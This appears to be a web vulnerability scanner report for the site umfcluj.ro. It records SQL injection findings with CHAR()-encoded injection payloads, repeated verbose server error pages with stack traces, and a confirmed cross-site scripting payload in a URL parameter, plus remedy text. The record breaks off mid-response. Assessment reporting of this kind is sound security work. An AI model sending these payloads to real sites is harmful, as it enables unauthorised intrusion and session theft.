[Exception]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 4
at Netlogiq.DA.FlexibleLists.StiriDA.SelectCalendarDS(String Type, String Locale) in E:\Projects\UMF\Development\StiriDA\StiriDA.cs:line 131
at Netlogiq.DA.FlexibleLists.StiriDA.SelectCalendar(String Type, String Locale) in E:\Projects\UMF\Development\StiriDA\StiriDA.cs:line 88
at Netlogiq.Web.Detaliu.PopulatePage()
at Netlogiq.Web.Detaliu.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type 'System.Web.HttpUnhandledException' was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context)
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at ASP.detaliu_aspx.ProcessRequest(HttpContext context) in c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_detaliu.aspx.cdcab7d2.dzk6d7jh.0.cs:line 0
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
- /rezultateleCautarii.aspx

/rezultateleCautarii.aspx

http://umfcluj.ro/rezultateleCautarii.aspx?n='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(6..

Parameters

Parameter Type Value
n GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
__EVENTARGUMENT POST 3
__EVENTTARGET POST 3
__EVENTVALIDATION POST /wEWBAKz55LlAQLhw6AyAuzu3YUFAv/frr4K
__SCROLLPOSITIONX POST 0
__SCROLLPOSITIONY POST 0
__VIEWSTATE POST /wEPDwUJNTYwMzY2NzAxZGQ=
ctl00$hAction POST 3
ctl00$txName POST Smith
ctl00$txNewsletter POST 3

Request

POST /rezultateleCautarii.aspx?n='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://umfcluj.ro/rezultateleCautarii.aspx?n=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Content-Length: 229
Accept-Encoding: gzip, deflate

__EVENTARGUMENT=3&__EVENTTARGET=3&__EVENTVALIDATION=%2fwEWBAKz55LlAQLhw6AyAuzu3YUFAv%2ffrr4K&__SCROLLPOSITIONX=0&__SCROLLPOSITIONY=0&__VIEWSTATE=%2fwEPDwUJNTYwMzY2NzAxZGQ%3d&ctl00$hAction=3&ctl00$txName=Smith&ctl00$txNewsletter=3

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 20:24:26 GMT
Content-Length: 6809


<html>
<head>
<title>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CH' at line 3</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CH' at line 3</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CH' at line 3<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CH' at line 3]
Netlogiq.DA.Products.ProductsDA.GetProductsSiteSearchDS(Int32 CategoryID, String Name, Int32 Location, String Locale, Int32 Start, Int32 Items) in E:\Projects\UMF\Development\prodDA\ProductsDA.cs:427
Netlogiq.DA.Products.ProductsDA.GetProductsSiteSearch(Int32 CategoryID, String Name, Int32 Location, String Locale, Int32 Start, Int32 Items, Int32&amp; Total, ArrayList&amp; subCategories) in E:\Projects\UMF\Development\prodDA\ProductsDA.cs:438
Netlogiq.Web.rezultateleCautarii.PopulatePage() +140
Netlogiq.Web.rezultateleCautarii.Page_Load(Object sender, EventArgs e) +21
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.4214; ASP.NET Version:2.0.50727.4209

</font>

</body>
</html>
<!--
[Exception]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CH' at line 3
at Netlogiq.DA.Products.ProductsDA.GetProductsSiteSearchDS(Int32 CategoryID, String Name, Int32 Location, String Locale, Int32 Start, Int32 Items) in E:\Projects\UMF\Development\prodDA\ProductsDA.cs:line 427
at Netlogiq.DA.Products.ProductsDA.GetProductsSiteSearch(Int32 CategoryID, String Name, Int32 Location, String Locale, Int32 Start, Int32 Items, Int32& Total, ArrayList& subCategories) in E:\Projects\UMF\Development\prodDA\ProductsDA.cs:line 438
at Netlogiq.Web.rezultateleCautarii.PopulatePage()
at Netlogiq.Web.rezultateleCautarii.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type 'System.Web.HttpUnhandledException' was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context)
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at ASP.rezultatelecautarii_aspx.ProcessRequest(HttpContext context) in c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_eifxp0xp.16.cs:line 0
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
- /rezultateleCautarii.aspx

/rezultateleCautarii.aspx

http://umfcluj.ro/rezultateleCautarii.aspx?n='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(6..

Parameters

Parameter Type Value
n GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
__VIEWSTATE POST /wEPDwUJNTYwMzY2NzAxZGQ=
__SCROLLPOSITIONX POST 0
__SCROLLPOSITIONY POST 0
__EVENTTARGET POST 3
__EVENTARGUMENT POST 3
__EVENTVALIDATION POST /wEWBAKz55LlAQLhw6AyAuzu3YUFAv/frr4K
ctl00$txNewsletter POST 3
ctl00$hAction POST 3

Request

POST /rezultateleCautarii.aspx?n='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://umfcluj.ro/rezultateleCautarii.aspx?n=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Content-Length: 210
Accept-Encoding: gzip, deflate

__VIEWSTATE=%2fwEPDwUJNTYwMzY2NzAxZGQ%3d&__SCROLLPOSITIONX=0&__SCROLLPOSITIONY=0&__EVENTTARGET=3&__EVENTARGUMENT=3&__EVENTVALIDATION=%2fwEWBAKz55LlAQLhw6AyAuzu3YUFAv%2ffrr4K&ctl00$txNewsletter=3&ctl00$hAction=3

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 20:36:39 GMT
Content-Length: 6809


<html>
<head>
<title>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CH' at line 3</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CH' at line 3</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CH' at line 3<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CH' at line 3]
Netlogiq.DA.Products.ProductsDA.GetProductsSiteSearchDS(Int32 CategoryID, String Name, Int32 Location, String Locale, Int32 Start, Int32 Items) in E:\Projects\UMF\Development\prodDA\ProductsDA.cs:427
Netlogiq.DA.Products.ProductsDA.GetProductsSiteSearch(Int32 CategoryID, String Name, Int32 Location, String Locale, Int32 Start, Int32 Items, Int32&amp; Total, ArrayList&amp; subCategories) in E:\Projects\UMF\Development\prodDA\ProductsDA.cs:438
Netlogiq.Web.rezultateleCautarii.PopulatePage() +140
Netlogiq.Web.rezultateleCautarii.Page_Load(Object sender, EventArgs e) +21
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.4214; ASP.NET Version:2.0.50727.4209

</font>

</body>
</html>
<!--
[Exception]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CH' at line 3
at Netlogiq.DA.Products.ProductsDA.GetProductsSiteSearchDS(Int32 CategoryID, String Name, Int32 Location, String Locale, Int32 Start, Int32 Items) in E:\Projects\UMF\Development\prodDA\ProductsDA.cs:line 427
at Netlogiq.DA.Products.ProductsDA.GetProductsSiteSearch(Int32 CategoryID, String Name, Int32 Location, String Locale, Int32 Start, Int32 Items, Int32& Total, ArrayList& subCategories) in E:\Projects\UMF\Development\prodDA\ProductsDA.cs:line 438
at Netlogiq.Web.rezultateleCautarii.PopulatePage()
at Netlogiq.Web.rezultateleCautarii.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type 'System.Web.HttpUnhandledException' was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context)
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at ASP.rezultatelecautarii_aspx.ProcessRequest(HttpContext context) in c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_eifxp0xp.16.cs:line 0
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
- /rezultateleCautarii.aspx

/rezultateleCautarii.aspx

http://umfcluj.ro/rezultateleCautarii.aspx?n='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(6..

Parameters

Parameter Type Value
n GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
__VIEWSTATE POST /wEPDwUJNTYwMzY2NzAxZGQ=
__SCROLLPOSITIONX POST 0
__SCROLLPOSITIONY POST 0
__EVENTTARGET POST 3
__EVENTARGUMENT POST 3
__EVENTVALIDATION POST /wEWBAKz55LlAQLhw6AyAuzu3YUFAv/frr4K
ctl00%24txNewsletter POST 3
ctl00%24hAction POST 3

Request

POST /rezultateleCautarii.aspx?n='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://umfcluj.ro/rezultateleCautarii.aspx?n=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Content-Length: 214
Accept-Encoding: gzip, deflate

__VIEWSTATE=%2fwEPDwUJNTYwMzY2NzAxZGQ%3d&__SCROLLPOSITIONX=0&__SCROLLPOSITIONY=0&__EVENTTARGET=3&__EVENTARGUMENT=3&__EVENTVALIDATION=%2fwEWBAKz55LlAQLhw6AyAuzu3YUFAv%2ffrr4K&ctl00%24txNewsletter=3&ctl00%24hAction=3

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 20:42:58 GMT
Content-Length: 6809


<html>
<head>
<title>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CH' at line 3</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CH' at line 3</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CH' at line 3<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CH' at line 3]
Netlogiq.DA.Products.ProductsDA.GetProductsSiteSearchDS(Int32 CategoryID, String Name, Int32 Location, String Locale, Int32 Start, Int32 Items) in E:\Projects\UMF\Development\prodDA\ProductsDA.cs:427
Netlogiq.DA.Products.ProductsDA.GetProductsSiteSearch(Int32 CategoryID, String Name, Int32 Location, String Locale, Int32 Start, Int32 Items, Int32&amp; Total, ArrayList&amp; subCategories) in E:\Projects\UMF\Development\prodDA\ProductsDA.cs:438
Netlogiq.Web.rezultateleCautarii.PopulatePage() +140
Netlogiq.Web.rezultateleCautarii.Page_Load(Object sender, EventArgs e) +21
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.4214; ASP.NET Version:2.0.50727.4209

</font>

</body>
</html>
<!--
[Exception]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CH' at line 3
at Netlogiq.DA.Products.ProductsDA.GetProductsSiteSearchDS(Int32 CategoryID, String Name, Int32 Location, String Locale, Int32 Start, Int32 Items) in E:\Projects\UMF\Development\prodDA\ProductsDA.cs:line 427
at Netlogiq.DA.Products.ProductsDA.GetProductsSiteSearch(Int32 CategoryID, String Name, Int32 Location, String Locale, Int32 Start, Int32 Items, Int32& Total, ArrayList& subCategories) in E:\Projects\UMF\Development\prodDA\ProductsDA.cs:line 438
at Netlogiq.Web.rezultateleCautarii.PopulatePage()
at Netlogiq.Web.rezultateleCautarii.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type 'System.Web.HttpUnhandledException' was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context)
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at ASP.rezultatelecautarii_aspx.ProcessRequest(HttpContext context) in c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_eifxp0xp.16.cs:line 0
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
Cross-site Scripting

Cross-site Scripting
2 TOTAL
IMPORTANT
CONFIRMED
2
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /lista.aspx

/lista.aspx CONFIRMED

http://umfcluj.ro/lista.aspx?t=%22%3E%3Cscript%3Ealert(9)%3C/script%3E&y=2011&m=7

Parameters

Parameter Type Value
t GET "><script>alert(9)</script>
y GET 2011
m GET 7
__EVENTARGUMENT POST 3
__EVENTTARGET POST 3
__EVENTVALIDATION POST /wEWBALi3Yf6AgLhw6AyAuzu3YUFAv/frr4K
__SCROLLPOSITIONX POST 0
__SCROLLPOSITIONY POST 0
__VIEWSTATE POST /wEPDwULLTIwMjEzOTE2MTVkZA==
ctl00$hAction POST 3
ctl00$txName POST Smith
ctl00$txNewsletter POST 3

Request

POST /lista.aspx?t=%22%3E%3Cscript%3Enetsparker(9)%3C/script%3E&y=2011&m=7 HTTP/1.1
Referer: http://umfcluj.ro/lista.aspx?t=Noutati&y=2011&m=7
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Content-Length: 235
Accept-Encoding: gzip, deflate

__EVENTARGUMENT=3&__EVENTTARGET=3&__EVENTVALIDATION=%2fwEWBALi3Yf6AgLhw6AyAuzu3YUFAv%2ffrr4K&__SCROLLPOSITIONX=0&__SCROLLPOSITIONY=0&__VIEWSTATE=%2fwEPDwULLTIwMjEzOTE2MTVkZA%3d%3d&ctl00$hAction=3&ctl00$txName=Smith&ctl00$txNewsletter=3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 18:05:08 GMT
Content-Length: 60297



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
